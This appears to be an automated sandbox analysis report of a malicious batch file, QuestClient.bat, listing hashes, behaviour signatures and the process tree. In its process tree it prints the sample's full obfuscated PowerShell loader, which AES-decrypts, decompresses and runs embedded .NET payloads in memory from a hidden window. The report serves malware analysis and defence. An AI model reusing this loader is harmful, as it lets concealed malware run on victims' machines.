Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
14/08/2024, 17:48
General
-
Target
QuestClient.bat
-
Size
456KB
-
MD5
c2cd34623e825a5da3bd0c3c6a7cc7a0
-
SHA1
1ce81a2392bff443e04b97a9ff76e0316c1ca850
-
SHA256
70c57f82283c07c45bca13b478c4f03bb81387e1d4b3945fc3e6c2483e878bc8
-
SHA512
ba0895bee303d9ff1e268b7cc512bc903a12465b6737f21594107d040592f8210b83c26bae3c0f6d0b9a12fd98f8702305a4b3b409a6b63b15c9b2a8d0b34ecf
-
SSDEEP
12288:Ve9+GI3rpF00cj8PF4617iCV1sYJKyoS4osZcD48:Ve9vI3FqgmCRoLosWDD
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\QuestClient.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MqCXbwte9uhPYEg+s1sfkk76fVMEhUBYBUcawnYJBSM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JloX3aFz+GqYGWzFbTGvHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Sniec=New-Object System.IO.MemoryStream(,$param_var); $ThfXY=New-Object System.IO.MemoryStream; $dRvPt=New-Object System.IO.Compression.GZipStream($Sniec, [IO.Compression.CompressionMode]::Decompress); $dRvPt.CopyTo($ThfXY); $dRvPt.Dispose(); $Sniec.Dispose(); $ThfXY.Dispose(); $ThfXY.ToArray();}function execute_function($param_var,$param2_var){ $yULDO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pPFbC=$yULDO.EntryPoint; $pPFbC.Invoke($null, $param2_var);}$FirRg = 'C:\Users\Admin\AppData\Local\Temp\QuestClient.bat';$host.UI.RawUI.WindowTitle = $FirRg;$xKJqy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FirRg).Split([Environment]::NewLine);foreach ($nlfgl in $xKJqy) { if ($nlfgl.StartsWith('wycXuQhiigqSLUkYJLaD')) { $nKIZB=$nlfgl.Substring(20); break; }}$payloads_var=[string[]]$nKIZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB